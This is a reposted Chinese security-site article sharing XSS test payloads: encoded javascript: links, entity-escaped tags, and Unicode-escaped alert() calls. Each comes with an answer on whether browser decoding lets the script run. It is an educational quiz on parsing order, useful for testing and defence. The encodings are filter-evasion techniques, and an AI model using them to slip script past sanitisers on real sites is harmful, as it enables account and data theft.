1. 极安网首页
  2. 网络安全工具

分享一些XSS的Payload

分享一些XSS的Payload-极安网

  1. 1. <a href="%6a%61%76%61%73%63%72%69%70%74:%61%6c%65%72%74%28%31%29"></a>
  2. URL encoded "javascript:alert(1)"
  3. 答:javascript不会执行。
  4. 2. <a
  5. href="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:%61
  6. %6c%65%72%74%28%32%29">
  7. Character entity encoded "javascript" and URL encoded "alert(2)"
  8. 答:javascript将执行。
  9. 3. <a href="javascript%3aalert(3)"></a>
  10. URL encoded ":"
  11. 答:javascript不会执行。
  12. 4. <div>&#60;img src=x onerror=alert(4)&#62;</div>
  13. Character entity encoded < and >
  14. 答:javascript不会执行。
  15. 5. <textarea>&#60;script&#62;alert(5)&#60;/script&#62;</textarea>
  16. Character entity encoded < and >
  17. 答案: javascript不会执行, 字符实体不会被解码
  18. 6. <textarea><script>alert(6)</script></textarea>
  19. 答:javascript不会执行。
  20. Advanced
  21. 7. <button onclick="confirm('7&#39;);">Button</button>
  22. Character entity encoded '
  23. 答:javascript将执行。
  24. 8. <button onclick="confirm('8\u0027);">Button</button>
  25. Unicode escape sequence encoded '
  26. 答:javascript不会执行。
  27. 9. <script>&#97;&#108;&#101;&#114;&#116&#40;&#57;&#41;&#59</script>
  28. Character entity encoded alert(9);
  29. 答:javascript不会执行。
  30. 10. <script>\u0061\u006c\u0065\u0072\u0074(10);</script>
  31. Unicode Escape sequence encoded alert
  32. 答:javascript将执行。
  33. 11. <script>\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0031\u0029</script>
  34. Unicode Escape sequence encoded alert(11)
  35. 答:javascript不会执行。
  36. 12. <script>\u0061\u006c\u0065\u0072\u0074(\u0031\u0032)</script>
  37. Unicode Escape sequence encoded alert and 12
  38. 答:javascript不会执行。
  39. 13. <script>alert('13\u0027)</script>
  40. Unicode escape sequence encoded '
  41. 答:javascript不会执行。
  42. 14. <script>alert('14\u000a')</script>
  43. Unicode escape sequence encoded line feed.
  44. 答:javascript将执行。
  45. Bonus
  46. 16. <a
  47.       href="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x36;&#x25;&#x33;&#x31;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x36;&#x25;&#x36;&#x33;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x36;&#x25;&#x33;&#x35;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x37;&#x25;&#x33;&#x32;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x37;&#x25;&#x33;&#x34;&#x28;&#x31;&#x35;&#x29;"></a>
  48. 答:javascript将执行。

本文转载:lovesickness,不代表 极安网 立场,转载请注明出处:https://secvery.com/1805.html